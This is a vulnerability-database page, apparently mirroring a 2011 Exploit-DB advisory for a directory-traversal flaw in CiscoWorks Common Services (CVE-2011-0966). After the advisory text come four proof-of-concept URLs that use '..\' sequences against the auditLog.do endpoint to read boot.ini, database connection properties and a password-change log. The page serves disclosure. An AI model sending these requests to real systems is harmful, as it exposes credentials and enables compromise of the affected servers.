Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbSense of SecurityEDB-ID:35781
HistoryMay 18, 2011 - 12:00 a.m.

CiscoWorks Common Services 3.1.1 - Auditing Directory Traversal

2011-05-1800:00:00
Sense of Security
www.exploit-db.com
17

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/47905/info

CiscoWorks Common Services is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead to a complete compromise of the affected computer.

This issue is being monitored by Cisco Bug ID CSCto35577.

CiscoWorks Common Services 3.3 and prior are vulnerable.

http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini
cmfDBA user database info:

http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties DB connection info for all databases:

http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties

Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example.
DB password change log:

http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\log\dbpwdChange.log

Related

cve 1
cvelist 1
prion 1
nvd 1
seebug 1
exploitdb 1
packetstorm 1
securityvulns 2
exploitpack 1
zdt 1
nessus 1
cve
cve
CVE-2011-0966
2011-05-20 22:55:03
cvelist
cvelist
CVE-2011-0966
2011-05-20 22:00:00
prion
prion
Directory traversal
2011-05-20 22:55:00
nvd
nvd
CVE-2011-0966
2011-05-20 22:55:03
seebug
seebug
Cisco Unified Operations Manager Multiple Vulnerabilities
2011-05-20 00:00:00
exploitdb
exploitdb
Cisco Unified Operations Manager - Multiple Vulnerabilities
2011-05-18 00:00:00
packetstorm
packetstorm
Cisco Unified Operations Manager XSS / SQL Injection / Directory Traversal
2011-05-18 00:00:00
securityvulns
securityvulns
Cisco Unified Operations Manager multiple security vulnerabilities
2011-05-21 00:00:00
Cisco Unified Operations Manager Multiple Vulnerabilities - SOS-11-006
2011-05-21 00:00:00
exploitpack
exploitpack
Cisco Unified Operations Manager - Multiple Vulnerabilities
2011-05-18 00:00:00
zdt
zdt
Cisco Unified Operations Manager Multiple Vulnerabilities - SOS-11-006
2011-05-18 00:00:00
nessus
nessus
Cisco Unified Operations Manager < 8.6 Multiple Vulnerabilities
2011-10-13 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:35781
cve1cvelist1prion1nvd1seebug1exploitdb1packetstorm1securityvulns2exploitpack1zdt1nessus1